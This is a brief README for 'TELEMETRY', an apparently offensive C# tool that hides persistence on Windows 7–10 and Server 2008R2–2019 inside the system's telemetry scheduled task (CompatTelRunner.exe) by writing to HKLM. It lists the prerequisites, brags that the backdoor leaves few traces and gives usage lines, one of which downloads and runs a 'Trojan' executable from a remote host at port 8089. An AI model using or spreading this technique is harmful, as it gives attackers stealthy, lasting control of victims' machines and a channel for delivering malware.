TELEMETRY: C# For Windows PERSISTENCE
TELEMETRY
TELEMETRY is a C# For Windows PERSISTENCE
Today we’re going to talk about a persistence method that takes advantage of some of the wonderful telemetry that Microsoft has included in Windows versions for the last decade.
- Local admin rights to install (requires the ability to write to HKLM)
- Have CompatTelRunner.exe
- 2008R2/Windows 7 through 2019/Windows 10
Advantage
- Using the system’s own Telemetry planned tasks
- Only registry suspicious backdoor troubleshooting
Command Line Usage
- Execute command without file backdoor
Telemetry.exe install /command:calc
- Remotely download Trojan files for backdoor startup
Telemetry.exe install /url:http://vps:8089/System.exe